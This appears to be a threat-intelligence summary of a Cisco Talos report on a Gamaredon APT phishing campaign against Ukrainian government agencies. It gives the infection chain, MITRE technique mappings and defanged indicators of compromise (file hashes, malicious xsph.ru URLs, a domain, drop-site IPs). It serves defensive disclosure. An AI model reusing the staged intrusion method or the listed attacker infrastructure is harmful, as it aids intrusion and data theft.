Threat Research

Gamaredon APT targets Ukrainian government agencies in new campaign

Securonix

Cisco Talos reports a new Gamaredon APT campaign targeting Ukrainian government entities, leveraging spear-phishing with Russian invasion-themed Office documents and malicious VBScript macros to seed infection. The operation uses a multi-stage chain (LNK in RAR, mshta to fetch and run PowerShell/VBScript, then a custom infostealer with data-exfiltration and persistence) to exfiltrate files, capture screens, and deploy additional payloads. #Gamaredon #xsph.ru #celticso.ru #GammaLoad #GammaSteel #Ukraine #Talos

Keypoints

  • Attribution: Campaign linked to the Russia-connected Gamaredon APT targeting Ukraine.
  • Phishing lure: Malicious Microsoft Office documents with remote templates and VBScript macros deliver the initial access.
  • Infection chain: VBScript macros download RAR archives containing LNK files, which in turn trigger the next-stage payload.
  • Execution flow: LNKs and mshta.exe download/parse a remote XML to execute a PowerShell script and VBScript via a staged sequence.
  • Capabilities: A PowerShell-based instrumentor decodes and executes commands, captures screens, and communicates with a C2 server to receive more payloads.
  • Infostealer: A new Gamaredon infostealer exfiltrates a wide range of file types, stores metadata, and uses a hardcoded C2 URL for exfiltration.

MITRE Techniques

  • [T1566.001] Phishing – Spearphishing Attachment – β€œphishing emails to deliver Microsoft Office documents containing remote templates with malicious VBScript macros.”
  • [T1059.005] VBScript – Macros in Office documents download and execute next-stage payloads via LNK in RAR archives.
  • [T1218.005] Mshta – Signed Binary Proxy Execution: Mshta used to β€œdownload and parse a remote XML file to execute a malicious PowerShell script.”
  • [T1059.001] PowerShell – Instrumentor script decodes and executes commands and VBScript via C2.
  • [T1027] Obfuscated/Compressed Files and Information – XOR-based decoding and obfuscation of payloads.
  • [T1113] Screen Capture – Repeatedly captures the current user’s screen with System.Windows.Forms.
  • [T1082] System Information Discovery – Collects computer name and volume serial number for exfiltration and C2 control.
  • [T1041] Exfiltration Over C2 Channel – Exfiltrates system info, base64-encoded screenshots, and other data to a C2 URL.
  • [T1547.001] Registry Run Keys/Startup Folder – Persistence via HKCU Run key named β€œWindows Task.”
  • [T1083] File and Directory Discovery – Enumerates files across drives, excluding certain system folders.
  • [T1071.001] Web Protocols – C2 communications over HTTP(S)/DNS-based lookups for payload delivery.
  • [T1071.001] – The Get-IP function and DNS lookups indicate C2 via web protocols and DNS-resolved IPs.

Indicators of Compromise

  • [Hash] Malicious – Documents4aa2c783ae3d2d58f12d5e89282069533a80a7ba6f7fe6c548c6230a9601e650
  • [Hash] LNK – Files581ed090237b314a9f5cd65076cd876c229e1d51328a24effd9c8d812eaebe6a, 34bf1a232870df28809597d49a70d9b549d776e1e4beb3308ff6d169a59ecd02
  • [Hash] LNK – 78c6b489ac6cebf846aab3687bbe64801fdf924f36f312802c6bb815ed6400ba
  • [Hash] LNK – 1cb2d299508739ae85d655efd6470c7402327d799eb4b69974e2efdb9226e447
  • [Hash] LNK – a9916af0476243e6e0dbef9c45b955959772c4d18b7d1df583623e06414e53b7
  • [Hash] LNK – 8294815c2342ff11739aff5a55c993f5dd23c6c7caff2ee770e69e88a7c4cb6a
  • [Hash] LNK – be79d470c081975528c0736a0aa10214e10e182c8948bc4526138846512f19e7
  • [Hash] LNK – 5264e8a8571fe0ef689933b8bc2ebe46b985c9263b24ea34e306d54358380cbb
  • [Hash] LNK – ff7e8580ce6df5d5f5a2448b4646690a6f6d66b1db37f887b451665f4115d1a2
  • [Hash] LNK – 1ec69271abd8ebd1a42ac1c2fa5cdd9373ff936dc73f246e7f77435c8fa0f84c
  • [URL] Malicious – hxxp://a0698649.xsph[.]ru/barley/barley.xml
  • [URL] Malicious – hxxp://a0700343.xsph[.]ru/new/preach.xml
  • [URL] Malicious – hxxp://a0700462.xsph[.]ru/grow/guests.xml
  • [URL] Malicious – hxxp://a0700462.xsph[.]ru/seek/lost.xml
  • [URL] Malicious – hxxp://a0701919.xsph[.]ru/head/selling.xml
  • [URL] Malicious – hxxp://a0701919.xsph[.]ru/predator/decimal.xml
  • [URL] Malicious – hxxp://a0701919.xsph[.]ru/registry/prediction.xml
  • [URL] Malicious – hxxp://a0704093.xsph[.]ru/basement/insufficient.xml
  • [URL] Malicious – hxxp://a0704093.xsph[.]ru/bass/grudge.xml
  • [URL] Malicious – hxxp://a0705076.xsph[.]ru/ramzeses1.html
  • [URL] Malicious – hxxp://a0705076.xsph[.]ru/regiment.txt
  • [URL] Malicious – hxxp://a0705269.xsph[.]ru/bars/dearest.txt
  • [URL] Malicious – hxxp://a0705269.xsph[.]ru/instruct/deaf.txt
  • [URL] Malicious – hxxp://a0705269.xsph[.]ru/prok/gur.html
  • [URL] Malicious – hxxp://a0705581.xsph[.]ru/guinea/preservation.txt
  • [URL] Malicious – hxxp://a0705880.xsph[.]ru/band/sentiment.txt
  • [URL] Malicious – hxxp://a0705880.xsph[.]ru/based/pre.txt
  • [URL] Malicious – hxxp://a0705880.xsph[.]ru/selection/seedling.txt
  • [URL] Malicious – hxxp://a0706248.xsph[.]ru/reject/headlong.txt
  • [URL] Malicious – hxxp://a0707763.xsph[.]ru/decipher/prayer.txt
  • [Domain] Malicious – celticso[.]ru
  • [IP] Additional Drop Site – 162[.]33[.]178[.]129
  • [IP] Additional Drop Site – 155[.]138[.]252[.]221

Read more: https://blog.talosintelligence.com/2022/09/gamaredon-apt-targets-ukrainian-agencies.html